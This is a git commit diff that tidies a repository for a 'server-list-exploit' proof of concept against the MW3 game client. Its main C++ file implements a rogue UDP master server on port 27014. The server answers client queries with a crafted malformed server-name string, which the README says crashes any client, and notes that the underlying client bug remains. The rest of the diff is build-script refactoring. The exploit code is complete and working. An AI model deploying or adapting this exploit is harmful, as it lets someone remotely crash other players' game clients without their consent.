clean up this project

2025-04-19 20:32:52 +00:00 · 2022-09-07 14:39:21 +02:00 · 2022-09-07 14:39:21 +02:00 · 12c0d485e0
commit 12c0d485e0
parent 163587cdbc
10 changed files with 133 additions and 149 deletions
--- a/README.md
+++ b/README.md
@ -11,17 +11,10 @@ The exploit has since been mitigated, but the underlying bug in the client remai
 ## How does this work?
-The exploit works by modifying the server name with a malicious string of characters. It will make any client crash.
+The exploit works by modifying the server name with a malicious string of characters.
 ## Compile from source
 - Clone the Git repo. Do NOT download it as ZIP, that won't work.
 - Run `premake5 vs2019` or simply use the delivered `generate.bat`.
 - Build via solution file in `build\server-list-exploit.sln`.
 ## Premake arguments
 | Argument                    | Description                                    |
 |:----------------------------|:-----------------------------------------------|
 | `--dev-build`            | Do nothing. |
 | `--copy-to`              | Copy the EXE to a custom folder after build. |
--- a/generate.bat
+++ b/generate.bat
@ -1,3 +1,3 @@
@echo off
 git submodule update --init --recursive
-tools\premake5 %* vs2019
+call tools\premake5 %* vs2022
--- a/premake5.lua
+++ b/premake5.lua
@ -42,14 +42,18 @@ newoption {
 dependencies.load()
 workspace "server-list-exploit"
 startproject "server-list-exploit"
 location "./build"
 objdir "%{wks.location}/obj"
 targetdir "%{wks.location}/bin/%{cfg.platform}/%{cfg.buildcfg}"
 configurations {"Debug", "Release"}
 language "C++"
 cppdialect "C++17"
 architecture "x86"
-platforms "x86"
+platforms "Win32"
 systemversion "latest"
 symbols "On"
@ -64,43 +68,35 @@ end
 flags {"NoIncrementalLink", "NoMinimalRebuild", "MultiProcessorCompile", "No64BitChecks" }
-filter "action:vs*"
+filter "platforms:Win*"
-buildoptions "/std:c++17"
+	defines {"_WINDOWS", "WIN32"}
-defines { "_WINDOWS", "WIN32" }
+filter {}
-filter "action:gmake*"
+filter "configurations:Release"
-cppdialect "C++17"
+	optimize "Size"
-buildoptions "-std=c++17"
+	buildoptions {"/GL"}
-defines { "_LINUX" }
+	linkoptions {"/IGNORE:4702", "/LTCG"}
 	defines {"NDEBUG"}
 	flags {"FatalCompileWarnings", "FatalLinkWarnings"}
 filter {}
-configuration "Release"
+filter "configurations:Debug"
-optimize "Size"
+	optimize "Debug"
-buildoptions {"/GL"}
+	defines {"DEBUG", "_DEBUG"}
-linkoptions { "/IGNORE:4702", "/LTCG" }
+filter {}
 defines {"NDEBUG"}
 flags {"FatalCompileWarnings"}
 configuration "Debug"
 optimize "Debug"
 defines {"DEBUG", "_DEBUG"}
 configuration {}
 project "server-list-exploit"
 kind "ConsoleApp"
 language "C++"
 pchheader "stdinc.hpp"
 pchsource "src/stdinc.cpp"
 files {"./src/**.hpp", "./src/**.cpp"}
 includedirs {"./src", "%{prj.location}/src"}
-- links {"kernel32", "user32", "Ws2_32"}
+resincludedirs {"$(ProjectDir)src"}
 pchheader "stdafx.hpp"
 pchsource "src/stdafx.cpp"
 dependencies.imports()
--- a/src/main.cpp
+++ b/src/main.cpp
@ -1,115 +1,114 @@
-#include "stdinc.hpp"
+#include "stdafx.hpp"
 #include "main.hpp"
 #define MW3_SERVER_4CC 0x504F4F4C
 #define BUF_SIZE 1024
-SOCKET sock;
+static SOCKET sock;
-bool startUp()
+bool start_up()
 {
-    WSADATA wsa_data;
+	WSADATA wsa_data;
-    auto wsaResult = WSAStartup(MAKEWORD(2, 2), &wsa_data);
+	const auto wsa_result = WSAStartup(MAKEWORD(2, 2), &wsa_data);
-    if (wsaResult != 0)
+	if (wsa_result != 0)
-    {
+	{
-        printf("WSAStartup error: %d\n", wsaResult);
+		printf("WSAStartup error: %d\n", wsa_result);
-        return false;
+		return false;
-    }
+	}
-    sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
-    if (INVALID_SOCKET == sock)
+	if (INVALID_SOCKET == sock)
-    {
+	{
-        printf("Can't initialize socket\n");
+		printf("Can't initialize socket\n");
-        return false;
+		return false;
-    }
+	}
-    sockaddr_in service{};
+	sockaddr_in service{};
-    service.sin_family = AF_INET;
+	service.sin_family = AF_INET;
-    service.sin_addr.s_addr = htonl(INADDR_ANY);
+	service.sin_addr.s_addr = htonl(INADDR_ANY);
-//  net_masterServerPort
+//	net_masterServerPort
-    service.sin_port = htons(27014);
+	service.sin_port = htons(27014);
-    auto result = bind(sock, (SOCKADDR*)&service, sizeof(service));
+	const auto result = bind(sock, (SOCKADDR*)&service, sizeof(service));
-    if (SOCKET_ERROR == result)
+	if (SOCKET_ERROR == result)
-    {
+	{
-        printf("Can't bind socket\n");
+		printf("Can't bind socket\n");
-        closesocket(sock);
+		closesocket(sock);
-        return false;
+		return false;
-    }
+	}
-    return true;
+	return true;
 }
-DWORD WINAPI recvTh(LPVOID)
+DWORD WINAPI recv_thread(LPVOID)
 {
-    auto buf = std::make_unique<char[]>(BUF_SIZE);
+	auto msg_buf = std::make_unique<char[]>(BUF_SIZE);
-    printf("Started thread\n");
+	printf("Started thread\n");
-    u_long iMode = 0;
+	u_long i_mode = 0;
-    auto ioctlResult = ioctlsocket(sock, FIONBIO, &iMode);
+	const auto ioctl_result = ioctlsocket(sock, FIONBIO, &i_mode);
-    if (ioctlResult != 0)
+	if (ioctl_result == SOCKET_ERROR)
-    {
+	{
-        printf("ioctlsocket error: %d\n", ioctlResult);
+		printf("ioctlsocket error: %d\n", ioctl_result);
-        return 1;
+		return 1;
-    }
+	}
-    sockaddr_in sender{};
+	static sockaddr_in sender{};
-    int senderSize = sizeof(sender);
+	static serverInfo_t info{};
    serverInfo_t info{};
-//  undisclosed step
+//	simplified step for this POC
-    info.serverName_ptr = 0;
+	info.serverName_ptr = 0;
-    info.rawDataSize = INFO_MAX_DATA;
+	info.rawDataSize = INFO_MAX_DATA;
-    while (TRUE)
+	while (true)
-    {
+	{
-        SecureZeroMemory(buf.get(), BUF_SIZE);
+		int sender_size = sizeof(sender);
-        auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize);
+		const auto len = recvfrom(sock, msg_buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &sender_size);
-        if (len == SOCKET_ERROR)
+		if (len == SOCKET_ERROR)
-        {
+		{
-            return 1;
+			return 1;
-        }
+		}
-        if (len == sizeof(serverQuery_t))
+		if (len == sizeof(serverQuery_t))
-        {
+		{
-            auto* packet = (serverQuery_t*)buf.get();
+			const auto* packet = (serverQuery_t*)msg_buf.get();
-            if (packet->magic4CC == MW3_SERVER_4CC)
+			if (packet->magic4CC == MW3_SERVER_4CC)
-            {
+			{
-                printf("Server is sending info to a client\n");
+				printf("Server is sending info to a client\n");
-                auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
+				auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
-//              auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
+//				auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
-                std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
+				std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
-                sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize);
+				sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, sender_size);
-            }
+			}
-        }
+		}
-        Sleep(1);
+		Sleep(1);
-    }
+	}
-    return 0;
+	return 0;
 }
 int main(int, char**)
 {
-    if (!startUp())
+	if (!start_up())
-    {
+	{
-        return 1;
+		return 1;
-    }
+	}
-    DWORD dwThreadId;
+	DWORD dw_thread_id;
-    auto thread = CreateThread(0, 0, recvTh, 0, 0, &dwThreadId);
+	auto thread = CreateThread(nullptr, 0, recv_thread, nullptr, 0, &dw_thread_id);
-    if (thread == NULL)
+	if (thread == nullptr)
-    {
+	{
-        printf("Error in creating thread\n");
+		printf("Error in creating thread\n");
-        return 1;
+		return 1;
-    }
+	}
-    WaitForSingleObject(thread, INFINITE);
+	WaitForSingleObject(thread, INFINITE);
-    closesocket(sock);
+	closesocket(sock);
-    WSACleanup();
+	WSACleanup();
-    return 0;
+	return 0;
 }
--- a/src/main.hpp
+++ b/src/main.hpp
@ -2,6 +2,7 @@
 #define INFO_MAX_DATA 2048
 // MW3 Client Specific Structures
 #pragma pack(1)
 typedef struct
--- a/src/stdafx.cpp
+++ b/src/stdafx.cpp
@ -0,0 +1 @@
 #include "stdafx.hpp"
--- a/src/stdafx.hpp
+++ b/src/stdafx.hpp
@ -0,0 +1,24 @@
 #ifdef _WIN32
 #pragma once
 #define WIN32_LEAN_AND_MEAN
 #include <Windows.h>
 #include <WinSock2.h>
 #include <WS2tcpip.h>
 #endif
 #include <string>
 #include <vector>
 #include <iostream>
 #include <memory>
 #include <string>
 #ifdef _WIN32
 #pragma comment (lib, "Ws2_32.lib")
 #endif
 using namespace std::literals;
--- a/src/stdinc.cpp
+++ b/src/stdinc.cpp
@ -1 +0,0 @@
 #include "stdinc.hpp"
--- a/src/stdinc.hpp
+++ b/src/stdinc.hpp
@ -1,29 +0,0 @@
 #ifdef _LINUX
 #pragma clang diagnostic push
 #pragma clang diagnostic ignored "-Wpragma-pack"
 #endif
 // defines
 #define WIN32_LEAN_AND_MEAN
 // windows headers
 #include <WinSock2.h>
 #include <ws2tcpip.h>
 #include <windows.h>
 #include <string>
 #include <vector>
 #include <iostream>
 #include <memory>
 #pragma comment (lib, "Ws2_32.lib")
 // std includes
 #include <string>
 using namespace std::literals;
 // c types
 #include <cstdint>
 #ifdef _LINUX
 #pragma clang diagnostic pop
 #endif
--- a/tools/premake5.exe
+++ b/tools/premake5.exe